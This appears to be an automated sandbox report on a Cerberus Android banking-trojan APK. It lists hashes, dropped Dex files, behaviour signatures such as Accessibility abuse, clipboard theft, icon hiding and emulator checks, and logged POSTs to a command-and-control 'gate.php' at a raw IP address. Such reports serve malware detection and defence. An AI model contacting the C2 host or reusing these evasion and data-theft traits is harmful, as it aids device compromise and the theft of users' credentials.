Analysis

  • max time kernel
    66s
  • max time network
    150s
  • platform
    android_x64
  • resource
    android-x64-arm64-20240624-en
  • resource tags

    androidarch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20240624-enlocale:en-usos:android-11-x64system
  • submitted
    10-11-2024 22:01

General

  • Target

    edd0a52d877489838cc2937f30b0257888a72771430e0d931c91e1847472f516.apk

  • Size

    2.2MB

  • MD5

    5525349628783c345f3a506d6f762f3f

  • SHA1

    f921c000517391932e4aa7c6c281e003f2d8c2ac

  • SHA256

    edd0a52d877489838cc2937f30b0257888a72771430e0d931c91e1847472f516

  • SHA512

    2166a00e9e0b6fa44d7df38b5474f7cf0ae60fe94b8da9f6dc4935731e84229f7c381f31e661d067e07892cbcf39385f1fef25c91719d4bb16f209b1bf19882c

  • SSDEEP

    49152:jNaMSlwqlbLcxCWHvKom475X6EfkZl1GjbTV6ocEe8ZqSbcBtk3X0grbbTWqbvL8:oMSl9bwxNHvEg5X6EfWKTA7EFqSgrWkf

Malware Config

Extracted

Family

cerberus

C2

http://5.161.217.34/

Signatures

Processes

  • com.film.chapter
    1⤵
    • Removes its main activity from the application launcher
    • Loads dropped Dex/Jar
    • Makes use of the framework's Accessibility service
    • Obtains sensitive information copied to the device clipboard
    • Performs UI accessibility actions on behalf of the user
    • Queries the mobile country code (MCC)
    • Requests disabling of battery optimizations (often used to enable hiding in the background).
    • Listens for changes in the sensor environment (might be used to detect emulation)
    • Checks CPU information
    • Checks memory information
    PID:4469

Network

  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    172.217.169.14
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    172.217.169.72
  • flag-us
    DNS
    pngimage.net
    Remote address:
    1.1.1.1:53
    Request
    pngimage.net
    IN A
    Response
    pngimage.net
    IN A
    104.21.33.28
    pngimage.net
    IN A
    172.67.140.187
  • flag-us
    DNS
    freeiconshop.com
    Remote address:
    1.1.1.1:53
    Request
    freeiconshop.com
    IN A
    Response
    freeiconshop.com
    IN A
    195.179.237.77
  • flag-us
    GET
    https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png
    Remote address:
    104.21.33.28:443
    Request
    GET /wp-content/uploads/2018/06/white-tick-png-8.png HTTP/2.0
    host: pngimage.net
    user-agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36
    accept: image/webp,image/apng,image/*,*/*;q=0.8
    x-requested-with: com.film.chapter
    sec-fetch-site: cross-site
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    accept-encoding: gzip, deflate
    accept-language: en-US,en;q=0.9
    Response
    HTTP/2.0 522
    date: Sun, 10 Nov 2024 22:03:38 GMT
    content-type: text/html; charset=UTF-8
    content-length: 7063
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zN3BZlZwvQohOKlHma4MKDjiL%2FGFAm%2F4%2FCWS8ea4Wv3fXO1LbIQHxkKMc4kj9yRctJIg4jPkyy%2FQNKIWOWYpg38fA%2FtLj3dfC31d%2BXnXkoJFZzX1njJnEFmXqwfeXqY%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    vary: Accept-Encoding
    x-frame-options: SAMEORIGIN
    referrer-policy: same-origin
    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    expires: Thu, 01 Jan 1970 00:00:01 GMT
    server: cloudflare
    cf-ray: 8e0954f28d9b8877-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=33578&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1058&delivery_rate=80785&cwnd=253&unsent_bytes=0&cid=7ae62cbfb019f044&ts=19616&x=0"
  • flag-us
    GET
    https://freeiconshop.com/wp-content/uploads/edd/android-flat.png
    Remote address:
    195.179.237.77:443
    Request
    GET /wp-content/uploads/edd/android-flat.png HTTP/2.0
    host: freeiconshop.com
    user-agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36
    accept: image/webp,image/apng,image/*,*/*;q=0.8
    x-requested-with: com.film.chapter
    sec-fetch-site: cross-site
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    accept-encoding: gzip, deflate
    accept-language: en-US,en;q=0.9
    Response
    HTTP/2.0 200
    cache-control: public, max-age=31536000
    expires: Mon, 10 Nov 2025 22:03:19 GMT
    content-type: image/png
    last-modified: Mon, 20 Nov 2017 16:17:50 GMT
    etag: "262e-5a13002e-2bcbf6f4ea0f20d9;;;"
    accept-ranges: bytes
    content-length: 9774
    date: Sun, 10 Nov 2024 22:03:19 GMT
    server: LiteSpeed
    platform: hostinger
    panel: hpanel
    content-security-policy: upgrade-insecure-requests
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 832
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:03:47 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:04:22 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:04:32 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:02 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:12 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:22 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • flag-us
    POST
    http://5.161.217.34//gate.php
    Remote address:
    5.161.217.34:80
    Request
    POST //gate.php HTTP/1.1
    Content-Length: 840
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.210722.013)
    Host: 5.161.217.34
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 308 Permanent Redirect
    Location: https://5.161.217.34//gate.php
    Date: Sun, 10 Nov 2024 22:05:33 GMT
    Content-Length: 18
    Content-Type: text/plain; charset=utf-8
  • 142.250.179.238:443
    tls, https
    1.5kB
    40 B
    1
    1
  • 142.250.179.238:443
    tls, https
    1.5kB
    40 B
    1
    1
  • 172.217.169.14:443
    android.apis.google.com
    tls
    5.6kB
    8.7kB
    23
    23
  • 172.217.169.72:443
    ssl.google-analytics.com
    tls
    1.3kB
    6.2kB
    8
    8
  • 104.21.33.28:443
    https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png
    tls, http2
    1.9kB
    11.6kB
    17
    15

    HTTP Request

    GET https://pngimage.net/wp-content/uploads/2018/06/white-tick-png-8.png

    HTTP Response

    522
  • 195.179.237.77:443
    https://freeiconshop.com/wp-content/uploads/edd/android-flat.png
    tls, http2
    1.8kB
    15.1kB
    15
    14

    HTTP Request

    GET https://freeiconshop.com/wp-content/uploads/edd/android-flat.png

    HTTP Response

    200
  • 172.217.169.14:443
    android.apis.google.com
    tls
    1.8kB
    5.9kB
    11
    11
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.4kB
    409 B
    6
    4

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 142.250.187.196:443
    tls, https
    436 B
    40 B
    2
    1
  • 142.250.187.196:443
    www.google.com
    tls
    10.9kB
    10.5kB
    26
    30
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 5.161.217.34:80
    http://5.161.217.34//gate.php
    http
    1.3kB
    357 B
    4
    3

    HTTP Request

    POST http://5.161.217.34//gate.php

    HTTP Response

    308
  • 224.0.0.251:5353
    3.7kB
    11
  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
    109 B
    1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    172.217.169.14

  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
    86 B
    1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    172.217.169.72

  • 1.1.1.1:53
    pngimage.net
    dns
    58 B
    90 B
    1
    1

    DNS Request

    pngimage.net

    DNS Response

    104.21.33.28
    172.67.140.187

  • 1.1.1.1:53
    freeiconshop.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    freeiconshop.com

    DNS Response

    195.179.237.77

MITRE ATT&CK Mobile v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /data/data/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    53KB

    MD5

    4c405a425d5263f6490085bfe1fb6906

    SHA1

    0ff79f0859caf8f84b2615d0c4595772e54829e1

    SHA256

    148d01b45d3de9c9aa01045bafd5c72a1608c4449566aea7955592358dfb12f0

    SHA512

    4b82ba1dbfe39d18a9e3719c87c5f076bc68fc7fa07db0caddbaa5abd41ac6628620dfbbe155d25667310ba1a2674c2cad76d4255ab68a7f161c0a0f70072bd2

  • /data/data/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    53KB

    MD5

    7ab72394bb86d1d70c5882a6dcd07357

    SHA1

    3a4e06074220cb735df034060b922d6288e399bc

    SHA256

    6491724426a3dfb5a5ccb9745d4d22fda480d725a6104de1bd699cce9dfc661b

    SHA512

    72099ad30a713ca88122567ab696d292559452e525d5d6bc6a2f4a1d416738f9973daf27c7b548620403ea3190f2b2bc5557847e4a7a55429928dfa57376e98f

  • /data/data/com.film.chapter/app_DynamicOptDex/oat/dQ.json.cur.prof

    Filesize

    160B

    MD5

    2508932e5d043772575f9b632e4da319

    SHA1

    f6eec2e2684a264b507301bc958987a0d4fd1100

    SHA256

    cdc776a845ded9e2e4e7fab3a2b6bb32ddb6d8095b126fe8e69d299b1de1816b

    SHA512

    bdf4993ba4843c602d00e453efcf5840760b24c7680bb77c3ea59d1200ce297fc5fdff4d4cd2811b60dd35a99f21c6dce8c866adc6626bb5cf4100d47137dbb5

  • /data/user/0/com.film.chapter/app_DynamicOptDex/dQ.json

    Filesize

    103KB

    MD5

    8370872f52a44a97444de3c6835e7e14

    SHA1

    ca35fa3e2883466c8b089b16f6a2745d9e335697

    SHA256

    8532c8b0f978411313e05b4ab29eaff23a197781d42155ca6a26268e06df4586

    SHA512

    6ee776db5608d091b6b84db8831590bda010e90e3168cbe3af39743c2e9a62d75f61219f3dac52fe16ed75a919149d07dfbc0861f67dbeaf5f3d2e3201cd3f01

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.